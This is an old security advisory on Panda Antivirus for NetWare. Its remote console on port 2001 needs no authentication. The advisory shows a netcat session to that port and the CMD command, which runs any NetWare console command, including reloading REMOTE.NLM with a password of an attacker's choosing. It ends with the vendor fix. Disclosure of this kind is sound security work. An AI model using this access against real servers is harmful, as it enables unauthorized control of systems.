COMMAND

    Panda Antivirus

SYSTEMS AFFECTED

    Panda Antivirus

PROBLEM

    Ian Vitek found following (Infosec Security Vulnerability Report).
    Customers to Panda  Antivirus may have  a Panda Antivirus  console
    open on port 2001.  This Panda console is open to everyone who has
    access to  this port.   You are  not prompted  for authentication.
    Example:

        foo:/# nc server 2001

        Panda Antivirus NetWare Servers
        Copyright 1998(c) Panda Software
        Version 2.00
        Last upgrade: 10/04/2000

        FS1 (#1): help
        ANALYZE             CMD                 HELP                LOAD
        RELOADCFG           UPDATE              UNLOAD              VER
        FS1 (#1): help cmd
        Make a console command of Netware
        CMD [Command NetWare]
        Example: CMD LOAD MONITOR

    Any Netware  command can  be executed  with the  CMD command (i.e.
    unloading and loading REMOTE.NLM with a password of your  choice).
    This was tested on Netware.

SOLUTION

    The fix  is included  on the  June 2000  version of  the GVI  disk
    (labeled M6/A00).